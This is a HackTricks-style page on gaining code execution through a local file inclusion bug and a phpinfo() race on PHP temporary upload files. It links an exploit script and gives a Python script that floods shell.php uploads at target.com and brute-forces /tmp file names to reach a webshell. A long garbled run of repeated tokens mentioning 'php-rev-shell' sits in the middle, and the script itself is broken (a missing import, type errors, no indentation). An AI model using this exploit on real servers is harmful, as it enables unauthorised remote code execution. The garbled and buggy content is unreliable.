<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>


To exploit this vulnerability you need: **A LFI vulnerability, a page where phpinfo() is displayed, "file\_uploads = on" and the server has to be able to write in the "/tmp" directory.**

[https://www.insomniasec.com/downloads/publications/phpinfolfi.py](https://www.insomniasec.com/downloads/publications/phpinfolfi.py)

**Tutorial HTB**: [https://www.youtube.com/watch?v=rs4zEwONzzk\&t=600s](https://www.youtube.com/watch?v=rs4zEwONzzk\&t=600s)

You need to fix the exploit (change **=>** for **=>**). To do so you can do:
```
sed -i 's/\[tmp_name\] \=>/\[tmp_name\] =\&gt/g' phpinfolfi.py
```
**payload**-nIv'a' 'e' **exploit**-Daq **REQ1**-nIv'a' 'e' **phpinfo**-Daq (php-rev-shell 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e' 'a' 'e
```python
import itertools
import requests
import sys

print('[+] Trying to win the race')
f = {'file': open('shell.php', 'rb')}
for _ in range(4096 * 4096):
requests.post('http://target.com/index.php?c=index.php', f)


print('[+] Bruteforcing the inclusion')
for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
url = 'http://target.com/index.php?c=/tmp/php' + fname
r = requests.get(url)
if 'load average' in r.text:  # <?php echo system('uptime');
print('[+] We have got a shell: ' + url)
sys.exit(0)

print('[x] Something went wrong, please try again')
```
<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>